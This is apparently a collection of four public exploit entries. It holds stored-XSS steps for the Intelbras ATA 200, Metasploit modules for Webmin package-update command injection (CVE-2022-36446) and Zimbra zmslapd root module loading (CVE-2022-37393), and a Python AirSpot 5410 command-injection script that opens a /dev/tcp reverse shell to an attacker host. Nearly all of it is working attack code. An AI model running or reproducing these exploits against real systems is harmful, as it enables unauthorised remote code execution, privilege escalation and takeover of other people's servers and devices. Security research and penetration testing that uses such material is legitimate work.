<pre><code># Exploit Title: Intelbras ATA 200 Authenticated Stored XSS<br /># Date: 17/01/2022<br /># Exploit Author: Leonardo Goncalves<br /># Vendor Homepage: https://www.intelbras.com/pt-br/adaptador-ip-para-telefones-analogicos-ata-200<br /># Version: Firmware 74.19.10.21<br /><br />1) Log in the equipment via your web browser<br />2) Go to Management > Syslog<br />3) In the "Field Server Address" inject the payload "-prompt("XSS")-"<br />4) Click Save<br />5) Exploit<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Webmin Package Updates RCE',<br /> 'Description' => %q{<br /> This module exploits an arbitrary command injection in Webmin<br /> versions prior to 1.997.<br /><br /> Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform<br /> package updates and installation. Due to a lack of input<br /> sanitization, it is possibe to inject arbitrary command that will be<br /> concatenated to the package manager call.<br /><br /> This exploit requires authentication and the account must have access<br /> to the Software Package Updates module.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Christophe De La Fuente', # MSF module<br /> 'Emir Polat' # Discovery and PoC<br /> ],<br /> 'References' => [<br /> [ 'EDB', '50998' ],<br /> [ 'URL', 'https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165'],<br /> [ 'CVE', '2022-36446']<br /> ],<br /> 'DisclosureDate' => '2022-07-26',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Privileged' => true,<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_AARCH64],<br /> 'Payload' => { 'BadChars' => '/' },<br /> 'DefaultOptions' => {<br /> 'RPORT' => 10000,<br /> 'SSL' => true<br /> },<br /> 'Targets' => [<br /> [<br /> 'Unix In-Memory',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_memory,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper (x86 & x64)',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper (ARM64)',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => ARCH_AARCH64,<br /> 'Type' => :linux_dropper,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp' }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [true, 'Base path to Webmin', '/']),<br /> OptString.new('USERNAME', [ true, 'User to login with', 'admin']),<br /> OptString.new('PASSWORD', [ false, 'Password to login with', '123456'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path)<br /> )<br /><br /> return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") unless res<br /><br /> if res.body.include?('This web server is running in SSL mode.')<br /> return CheckCode::Unknown("#{peer} - Please enable the SSL option to proceed")<br /> end<br /><br /> version = res.headers['Server'].to_s.scan(%r{MiniServ/([\d.]+)}).flatten.first<br /><br /> return CheckCode::Unknown("#{peer} - Webmin version not detected") unless version<br /><br /> version = Rex::Version.new(version)<br /><br /> vprint_status("Webmin #{version} detected")<br /><br /> unless version < Rex::Version.new('1.997')<br /> return CheckCode::Safe("#{peer} - Webmin #{version} is not a supported target")<br /> end<br /><br /> vprint_good("Webmin #{version} is a supported target")<br /><br /> CheckCode::Appears<br /> rescue ::Rex::ConnectionError<br /> return CheckCode::Unknown("#{peer} - Could not connect to web service")<br /> end<br /><br /> def do_login<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/session_login.cgi'),<br /> 'headers' => { 'Referer' => full_uri },<br /> 'cookie' => 'testing=1',<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'user' => datastore['USERNAME'],<br /> 'pass' => datastore['PASSWORD']<br /> }<br /> })<br /><br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") unless res<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 302<br /><br /> print_good('Logged in!')<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> cmd = cmd.gsub('/', '${SEP}').gsub('\'', '"')<br /> cmd = "#{rand_text_alphanumeric(4)};SEP=$(perl -MMIME::Base64 -e \"print decode_base64('Lw==')\")&&#{cmd}"<br /><br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/package-updates/update.cgi'),<br /> 'headers' => { 'Referer' => full_uri },<br /> 'vars_post' => {<br /> 'mode' => 'new',<br /> 'search' => rand_text(10),<br /> 'redir' => '',<br /> 'redirdesc' => '',<br /> 'u' => cmd,<br /> 'confirm' => 'Install Now'<br /> }<br /> })<br /> end<br /><br /> def exploit<br /> print_status('Attempting login')<br /> do_login<br /><br /> print_status('Sending payload')<br /> case target['Type']<br /> when :unix_memory<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> rescue ::Rex::ConnectionError<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Post::Linux::Priv<br /> include Msf::Post::Linux::System<br /> include Msf::Post::Linux::Compile<br /> include Msf::Post::Linux::Kernel<br /> include Msf::Post::File<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Zimbra zmslapd arbitrary module load',<br /> 'Description' => %q{<br /> This module exploits CVE-2022-37393, which is a vulnerability in<br /> Zimbra's sudo configuration that permits the zimbra user to execute<br /> the zmslapd binary as root with arbitrary parameters. As part of its<br /> intended functionality, zmslapd can load a user-defined configuration<br /> file, which includes plugins in the form of .so files, which also<br /> execute as root.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Darren Martyn', # discovery and poc<br /> 'Ron Bowes', # Module<br /> ],<br /> 'DisclosureDate' => '2021-10-27',<br /> 'Platform' => [ 'linux' ],<br /> 'Arch' => [ ARCH_X86, ARCH_X64 ],<br /> 'SessionTypes' => [ 'shell', 'meterpreter' ],<br /> 'Privileged' => true,<br /> 'References' => [<br /> [ 'CVE', '2022-37393' ],<br /> [ 'URL', 'https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/' ],<br /> ],<br /> 'Targets' => [<br /> [ 'Auto', {} ],<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ IOC_IN_LOGS ]<br /> }<br /> )<br /> )<br /> register_options [<br /> OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]),<br /> OptString.new('ZIMBRA_BASE', [ true, "Zimbra's installation directory", '/opt/zimbra' ]),<br /> ]<br /> register_advanced_options [<br /> OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])<br /> ]<br /> end<br /><br /> # Because this isn't patched, I can't say with 100% certainty that this will<br /> # detect a future patch (it depends on how they patch it)<br /> def check<br /> # Sanity check<br /> if is_root?<br /> fail_with(Failure::None, 'Session already has root privileges')<br /> end<br /><br /> unless file_exist?("#{datastore['ZIMBRA_BASE']}/libexec/zmslapd")<br /> print_error("zmslapd executable not detected: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd (set ZIMBRA_BASE if Zimbra is installed in an unusual location)")<br /> return CheckCode::Safe<br /> end<br /><br /> unless command_exists?(datastore['SUDO_PATH'])<br /> print_error("Could not find sudo: #{datastore['SUDOPATH']} (set SUDO_PATH if sudo isn't in $PATH)")<br /> return CheckCode::Safe<br /> end<br /><br /> # Run `sudo -n -l` to make sure we have access to the target command<br /> cmd = "#{datastore['SUDO_PATH']} -n -l"<br /> print_status "Executing: #{cmd}"<br /> output = cmd_exec(cmd).to_s<br /><br /> if !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required')<br /> print_error('Current user could not execute sudo -l')<br /> return CheckCode::Safe<br /> end<br /><br /> if !output.include?("(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd")<br /> print_error('Current user does not have access to run zmslapd')<br /> return CheckCode::Safe<br /> end<br /><br /> CheckCode::Appears<br /> end<br /><br /> def exploit<br /> base_dir = datastore['WritableDir'].to_s<br /> unless writable?(base_dir)<br /> fail_with(Failure::BadConfig, "#{base_dir} is not writable")<br /> end<br /><br /> # Generate a random directory<br /> exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"<br /> if file_exist?(exploit_dir)<br /> fail_with(Failure::BadConfig, 'Exploit dir already exists')<br /> end<br /><br /> # Create the directory and get ready to remove it<br /> print_status("Creating exploit directory: #{exploit_dir}")<br /> mkdir(exploit_dir)<br /> register_dir_for_cleanup(exploit_dir)<br /><br /> # Generate some filenames<br /> library_name = ".#{rand_text_alphanumeric(5..10)}.so"<br /> library_path = "#{exploit_dir}/#{library_name}"<br /> config_name = ".#{rand_text_alphanumeric(5..10)}"<br /> config_path = "#{exploit_dir}/#{config_name}"<br /><br /> # Create the .conf file<br /> config = "modulepath #{exploit_dir}\nmoduleload #{library_name}\n"<br /> write_file(config_path, config)<br /><br /> write_file(library_path, generate_payload_dll)<br /><br /> cmd = "sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}"<br /> print_status "Attempting to trigger payload: #{cmd}"<br /> out = cmd_exec(cmd)<br /><br /> unless session_created?<br /> print_error("Failed to create session! Cmd output = #{out}")<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># -*- coding: utf-8 -*-<br /><br /># Exploit Title: AirSpot unauthenticated remote command injection<br /># Date: 7/26/2022<br /># Exploit Author: Samy Younsi (NSLABS) (https://samy.link)<br /># Vendor Homepage: https://www.airspan.com/<br /># Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf<br /># Version: 0.3.4.1-4 and under.<br /># Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)<br /># CVE : CVE-2022-36267<br /><br />from __future__ import print_function, unicode_literals<br />import argparse<br />import requests<br />import urllib3<br />urllib3.disable_warnings()<br /><br />def banner():<br /> airspanLogo = """ <br /> ,-.<br /> / \ `. __..-,O<br /> : \ --''_..-'.'<br /> | . .-' `. '.<br /> : . .`.'<br /> \ `. / ..<br /> \ `. ' .<br /> `, `. \<br /> ,|,`. `-.\<br /> '.|| ``-...__..-`<br /> | | Airspan <br /> |__| AirSpot 5410<br /> /||\ PWNED x_x<br /> //||\\<br /> // || \\<br /> __//__||__\\__<br />'--------------'Necrum Security Labs<br /> <br />\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m <br /> FOR EDUCATIONAL PURPOSE ONLY. <br /> """<br /> return print('\033[1;94m{}\033[1;m'.format(airspanLogo))<br /><br />def pingWebInterface(RHOST, RPORT):<br /> url = 'https://{}:{}'.format(RHOST, RPORT)<br /> try:<br /> response = requests.get(url, allow_redirects=False, verify=False, timeout=30)<br /> if response.status_code != 200:<br /> print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')<br /> exit()<br /> print('[INFO] Airspan device web interface seems reachable!')<br /> except:<br /> print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')<br /> exit()<br /><br /><br />def execReverseShell(RHOST, RPORT, LHOST, LPORT):<br /> payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)<br /> data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)<br /> try:<br /> print('[INFO] Executing reverse shell...')<br /> response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)<br /> print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))<br /> return<br /> except Exception as e:<br /> print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)<br /> return False<br /><br />def main():<br /> banner()<br /> args = parser.parse_args()<br /> pingWebInterface(args.RHOST, args.RPORT)<br /> execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)<br /><br /><br />if __name__ == "__main__":<br /> parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)<br /> parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)<br /> parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)<br /> parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)<br /> parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)<br /> main()<br /></code></pre>